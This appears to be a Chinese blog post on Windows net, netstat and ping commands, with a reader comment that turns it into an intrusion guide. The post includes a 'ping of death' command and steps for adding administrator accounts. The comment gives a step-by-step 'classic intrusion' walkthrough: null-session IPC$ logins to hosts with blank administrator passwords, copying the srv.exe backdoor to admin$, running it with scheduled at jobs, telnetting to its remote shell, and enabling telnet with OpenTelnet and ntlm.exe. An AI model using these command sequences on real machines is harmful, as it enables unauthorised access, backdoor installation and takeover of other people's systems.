DOS命令之net use命令详细解释net use ipipc$ " " /user:" " 建立IPC空链接net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:net use h: ipc$ 登陆后映射对方C：到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务；(如:net start telnet， net start schedule)net stop 服务名停止某服务net time 目标ip 查看对方时间net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C：共享net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况，常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping 就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA 分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A 表示删除除只读、隐藏、系统、存档以外的文件。

例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件>net use H: \\192.168.1.20\downloads /user:admin p@ssword net use * /d评论 # re: DOS命令之net use命令详细解释 2009-06-05 08:20 蜘蛛1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$4)删除一个ipc$连接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盘，其他盘类推net use * /del 删除全部,会有提示要求按y确认3 查看远程主机的共享资源（但看不到默认共享）net view \\IP4 查看本地主机的共享资源（可以看到本地的默认共享）net share5 得到远程主机的用户名列表nbtstat -A IP6 得到本地主机的用户列表net user7 查看远程主机的当前时间net time \\IP8 显示本地主机当前服务net start9 启动/关闭本地服务net start 服务名 /ynet stop 服务名 /y10 映射远程共享:net use z: \\IP\baby此命令将共享名为baby的共享资源映射到z盘11 删除共享映射net use c: /del 删除映射的c盘，其他盘类推net use * /del /y删除全部12 向远程主机复制文件copy \路径\srv.exe \\IP\共享目录名，如：copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内13 远程添加计划任务at \\ip 时间程序名，如：at \\127.0.0.0 11:00 love.exe注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径14 开启远程主机的telnet这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：1）目标开启了ipc$共享2）你要拥有管理员密码和帐号3）目标开启RemoteRegistry服务，用户就该ntlm认证4）对WIN2K/XP有效，NT未经测试命令格式：OpenTelnet.exe \\server account psw NTLM认证方式port试例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 9015 激活用户/加入管理员组1 net uesr account /active:yes2 net localgroup administrators account /add16 关闭远程主机的telnet同样需要一个小程序：ResumeTelnet.exe命令格式：ResumeTelnet.exe \\server account psw试例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""17 删除一个已建立的ipc$连接net use \\IP\ipc$ /del九经典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators，密码为"空"的IP 地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

复制之前务必用net view \\IP这个命令看一下对方的共享情况2. C:\>copy srv.exe \\127.0.0.1\admin$先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin 用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\>net time \\127.0.0.1查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）5. C:\>net time \\127.0.0.1再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午11:05，那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99这里会用到Telnet命令吧，注意端口是99。

Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32>ntlm输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。